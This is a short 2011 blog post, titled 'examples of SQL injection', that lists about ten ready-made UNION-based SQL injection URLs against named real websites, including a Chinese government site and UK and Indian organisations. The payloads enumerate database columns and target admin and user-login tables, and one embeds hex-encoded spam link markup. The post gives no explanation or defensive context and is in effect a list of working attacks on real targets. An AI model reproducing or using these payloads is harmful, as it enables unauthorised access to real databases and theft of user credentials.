Pages

Tuesday, November 1, 2011

examples of SQL injection

its a example of SQL injection:


 http://www.sail.co.in/showpressrelease.php?id=-249+union+select+all+1%2C2%2Cgroup_concat(column_name)%2C4%2C5%2C6%2C7%2C8%2C9+from+information_schema.columns+where+table_schema%3Ddatabase()--


http://www.sagems.in/product_list.php?id=-32+union+select+1,2,3,group_concat(column_name),5,6,7+from+information_schema.columns+where+table_name=0x61646d696e--


http://www.musicintheround.co.uk/event.php?id=-121%20UNION%20SELECT%201,2,3,4,5,group_concat(column_name,0x3e,table_schema,0x3e,table_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.columns+where+column_name+like+CHAR(37,%20117,%20115,%20101,%20114,%2037)--

http://www.tchjbh.gov.cn/news_display.php?id=148+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(column_name),15,16,17,18,19,20,21+from+information_schema.columns+where+table_name+in(0x61646d696e696e666f)--



http://chaithanya.org/php/readmore.php?id=-5+union+select+1,0x3c6120687265663d22687474703a2f2f6f656d2d626573746275792e62697a2f736f6674776172652f72656164792d6163652d31302e372d6d756c74696c616e672e68746d6c22207469746c653d227265616479206163652031302e37206d756c74696c616e67223e7265616479206163652031302e37206d756c74696c616e673c2f613e,group_concat(0x0b,column_name),4,5,6,7,8,9+from+information_schema.columns+where+table_name=0x757365726C6F67696E+--+  


http://www.ruscombe.org/calendar_detail.php?id=999999.9+UNION+ALL+SELECT+0x31303235343830303536%2C(select+concat(0x7e%2C0x27%2Cunhex(Hex(cast(group_concat(column_name)+as+char)))%2C0x27%2C0x7e)+FROM+information_schema.columns+Where+table_schema%3D0x727573636F6D62655F73697465+AND+table_name%3D0x7573657273)%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--



http://www.rabtaeg.org/page.php?subcat=-43%20union%20select%201,2,3,4,5,6,group_concat(%200x3c62723e,table_name,0x3d,column_name,0x3e,table_schema),8%20from%20information_schema.columns%20Where%20column_name%20like%20char(37,117,115,101,114,37)--&Lang=ar


http://www.dctc.org.uk/index.php?contentId=-76+union+select+1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+information_schema.columns+where+table_name=0x636D735F7573657273+--+



http://www.serpentine.org.uk/news/index.php?id=999999.9'+UNION+ALL+SELECT+0x31303235343830303536%2C0x31303235343830303536%2C(select+concat(0x7e%2C0x27%2Cgroup_concat(column_name)%2C0x27%2C0x7e)+FROM+information_schema.columns+Where+table_schema%3D0x73657270656E74696E655F6F72675F756B5F2D5F636D73+AND+table_name%3D0x61646D696E4163636573736C6576656C73)%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536+and+'x'%3D'x



http://www.gp.org/press/pr-national.php?ID=-321'+union+select+group_concat(column_name),2,3,4,5,6,7+from+information_schema.columns+where+table_name+like+CHAR(76,%20111,%20103,%20105,%20110)+--+

0 comments:

Post a Comment

Related Posts Plugin for WordPress, Blogger...